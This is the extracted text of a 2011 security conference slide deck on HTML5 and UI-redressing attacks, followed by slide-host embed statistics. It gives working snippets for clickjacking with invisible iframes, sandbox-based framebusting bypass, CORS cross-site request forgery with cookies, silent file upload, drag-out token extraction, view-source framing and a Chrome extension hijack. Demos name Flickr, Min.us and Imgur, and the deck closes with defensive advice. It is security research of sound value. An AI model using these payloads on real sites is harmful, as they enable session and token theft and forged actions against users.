Html5: something wicked this way comes - HackPra

HTML5:Something wicked this way comesHackPra, Bochum Krzysztof Kotowicz, Securing11.2011 krzysztof.kotowicz@securing.pl @kkotowicz

About me• security researcher • HTML 5 • UI redressing / clickjacking • xss-track, squid-imposter, ...• pentester• IT security trainer • „Hacking HTML5” 2

Plan• Same Origin Policy• Exploiting users• Attack toolbox • demos • obligatory 0-day ;)• Wrap-up 3

Same origin policy• the single most important security concept for the web• restricts communication between websites from different domains• has many ﬂavors• without it hell breaks loose • worldwide XSS mayhem 4

Same origin policy• can be relaxed though • crossdomain.xml • document.domain • HTML5 Cross Origin Resource Sharing• or ignored... • by exploiting users • UI redressing 5

UI Redressing? Jedi mind tricks on victim users 6

UI Redressing • This is not the page you’re looking at • This is not the thing you’re clicking • .................................................. dragging • .................................................. typing • .................................................. copying • Victims attack the applications for us 7

Exploiting users //goo.gl/DgPpY 8

Combined attacks1. Analyze target2. Choose pieces • HTML5 • UI redressing3. Plant the attack4. ....5. Proﬁt! 9

Attack toolbox 10

Framing<iframe src=//google.com></iframe> 11

Framing• Frames can • move • be nested • be invisible<iframe src=//google.comstyle="opacity:0;"></iframe> 12

Framing – prevention• X-Frame-Options 13

Framing – prevention• JS Framebustingif (top !== self) { top.location = self.location;}// and many others.... 14

X-Frame-Options Marcus Niemietz, February 2011 • Home pages HTTP header analysis • Based on Alexa Count Rate Top 100 3 3.00% Top 1000 9 0.90% Top 10000 33 0.33% Not that popular yet 15

Basic clickjacking 16

Basic clickjacking 20x20 <iframe> 17

Basic clickjacking <iframe> -300 -350 20x20 18

Basic clickjacking <iframe> Victim website 20x20 Like us, plz! 19

Basic clickjacking <iframe src=outer.htmlwidth=20 height=20 scrolling=nostyle="opacity:0;"></iframe><iframe src="//victim" width=5000height=5000 style="position:absolute; top:-300px; left:-350px;"></iframe> 20

Basic clickjacking• Use to: click on link, button etc.• Trick: Click here to see a video!• User interaction: click+ Any clickable action+ Works in every browser- X-Frame-Option- JS framebusting 21

HTML5 IFRAME sandbox• Used to embed untrusted content • prevents XSS • prevents defacement• Facilitates clickjacking!<iframe sandbox="allow-same-originallow-forms allow-scripts" src="//victim"></iframe> //html5sec.org/#122 22

HTML5 IFRAME sandbox• Use to: protect from frame busting+ Chrome / Safari / IE 10+ Will disable most JS framebusters- X-Frame-Option 23

Cross Origin Resource Sharing• HTML5-ish• Cross domain AJAX• With cookies• Blind • Unless the receiving site agrees• Not limited to <form> syntax 24

Cross Origin Resource Sharingvar xhr = new XMLHttpRequest(); xhr.open("POST", "http://victim", true);xhr.setRequestHeader("Content-Type", "text/plain");xhr.withCredentials = "true"; // send cookiesxhr.send("Anything I want"); 25

Cross Origin Resource SharingPOST / HTTP/1.1Host: victimReferer: http://dev.localhost/temp/cors.phpContent-Length: 15Origin: http://dev.localhostContent-Type: text/plain...Cookie: my-cookie=myvalueAnything I want 26

Cross Origin Resource Sharing• Use to: Cross Site Request Forgery• User interaction: none 27

Silent file upload• File upload purely in Javascript• Silent <input type=ﬁle> with any ﬁle name and content• Uses CORS• How? Raw multipart/form-data 28

Silent file uploadfunction fileUpload(url, fileData, fileName) { var fileSize = fileData.length, boundary = "xxxxxxxxx", xhr = new XMLHttpRequest(); xhr.open("POST", url, true); xhr.withCredentials = "true"; xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary); xhr.setRequestHeader("Content-Length", fileSize); 29

Silent file uploadvar body = "--" + boundary + rnContent-Disposition: form-data; name="contents"; filename=" + fileName + "rnContent-Type: application/octet-streamrnrn + fileData + rn-- + boundary + --;xhr.send(body); 30

Silent file upload• Use to: CSRF file upload• User interaction: none+ Works in most browsers+ You can add more form fields- CSRF flaw needed- No access to response 31

Silent file upload DEMO Flickr.com 32

Flickr.com attack toolbox• Remember me • Flickr creates logged session on first request• CSRF file upload • http://up.flickr.com/photos/upload/transfer/ • accepts file uploads • token check skipped 33

Drag into• Put attackers content into victim form 34

Drag into DEMO Alphabet Hero 35

Drag into• Use to: self XSS, ﬁll whitelists, enter comments...• Trick: Put paper in the can!• User interaction: drag & drop, click+ Inject arbitrary content+ Trigger self-XSS- Firefox only- X-Frame-Option- JS framebusting 36

Drag out content extraction image image 37

Drag out content extraction image victim <iframe> image 38

Drag out content extraction image victim <iframe> textarea <textarea> 39

Drag out content extraction<div id=game style="position:relative"> <img style="position:absolute;..." src="paper.png" /> <img style="position:absolute;..." src="trash.png" /> <iframe scrolling=no id=iframe style="position:absolute;opacity:0;..."> </iframe> <textarea style="position:absolute; opacity:0;..." id=dropper></textarea></div> 40

Drag out content extraction 41

Drag out content extraction 42

Drag out content extraction$("#iframe").attr(src, outer.html’);$(#dropper).bind(drop, function() { setTimeout(function() { var urlmatch = $("#dropper").val() .match(/token=([a-h0-9]+)$/); if (urlmatch) { var token = urlmatch[1]; // do EVIL } }, 100);}); 43

Drag out content extraction• Use to: get tokens, session ids, private data• Trick: Put paper in the can!• User interaction: drag & drop+ Access sensitive content cross domain- Firefox only- X-Frame-Option- JS framebusting 44

Drag out content extraction DEMO Min.us 45

Min.us attack toolbox• CORS to create gallery• social engineering • extract gallery editor-id from <a href>• silent ﬁle upload to gallery• CORS change gallery to public• HTML5 + UI redressing combined! 46

View-source• Display HTML source in frame • session IDs • tokens • private data<iframe src="view-source:view-source:http://victim" width=5000 height=5000 style="position: absolute; top: -300px; left: -150px;"></iframe> 47

View-source 48

View-source 49

View-source• Use to: get more content• Trick: Your serial number is...• User interaction: select + drag & drop, copy- paste+ Beats JS framebusting- X-Frame-Options- Firefox only- Complicated user action 50

View-source DEMO Imgur.com 51

Imgur.com attack toolbox• framed view-source: • captcha-like string (AdSense ID) • session ID• social engineering: • trick to copy/paste page source• Exploitation: • http://api.imgur.com • cookie auth, no IP limits for session 52

Google Chrome addons hijacking• HTML5 apps• Unique ID • chrome-extension://id/res.html• Can attach content scripts to pages • access page DOM • JS runtimes are separated • page canot see addon JS • addon cannot see page JS • Can exchange messages with other components 53

Google Chrome addons hijacking• Page can load addon resources<iframe src="chrome-extension://oadbo...adc/popup.html"></iframe>var popup = window.open( chrome-extension://oadbo...adc/popup.html);• So what? 54

Google Chrome addons hijacking• Chrome To Phone 2.3.1 hijack 0-day //kotowicz.net/chrome-to-phone/ 55

Google Chrome addons hijacking• popup.htmlchrome.extension.onConnect.addListener(function(port){ port.onMessage.addListener(function(info) { //... sendToPhone(info.title, info.url, msgType,info.selection,sendToPhoneListener); });});//...chrome.tabs.executeScript(null, {file:"content_script.js"}); 56

Google Chrome addons hijacking• content_script.jsvar pageInfo = { "url": document.location.href, "title": document.title, "selection": window.getSelection().toString()};chrome.extension.connect().postMessage(pageInfo); 57

Google Chrome addons hijacking1. popup loads when you click2. starts listening3. adds a script to current tab4. script sends current URL5. popup gets URL and sends to Android http://... popup.html content_script.js 58

Google Chrome addons hijacking• manifest.json "content_scripts": [ { "js": [ "content_script.js" ], "matches": [ "http://*/*", "https://*/*" ] } ],• Sending script is always attached to every page on every tab http://... content_script.js 59

Google Chrome addons hijacking 60

Google Chrome addons hijacking• We just have to start listeningvar popup = window.open(chrome-extension://..../popup.html);window.focus(); // hide popup 61

Summary• UI redressing attacks are improving• HTML5 helps exploiting vulnerabilities• Users can be a weak link too! Developers: Use X-Frame-Options: DENY 62

Links• html5sec.org• code.google.com/p/html5security• www.contextis.co.uk/research/white-papers/ clickjacking• blog.kotowicz.net• github.com/koto Twitter: @kkotowicz kkotowicz@securing.pl 63

http://blog.kotowicz.net	7114
http://css.dzone.com	492
http://www.studentnotes.eu	152
http://feeds.feedburner.com	116
http://www.uostas.com	39
http://webcache.googleusercontent.com	35
http://www.wilsolutions.com.br	21
http://translate.googleusercontent.com	16
http://paper.li	11
http://uostas.com	11
http://www.mybestcv.co.il	10
http://hl.mailru.su	3
http://www.dzone.com	2
http://a0.twimg.com	1
http://www.linkedin.com	1
http://localhost	1

Html5: something wicked this way comes - HackPra

by Krzysztof Kotowicz

Accessibility

Categories

Upload Details

Usage Rights

16 Embeds 8,025

Statistics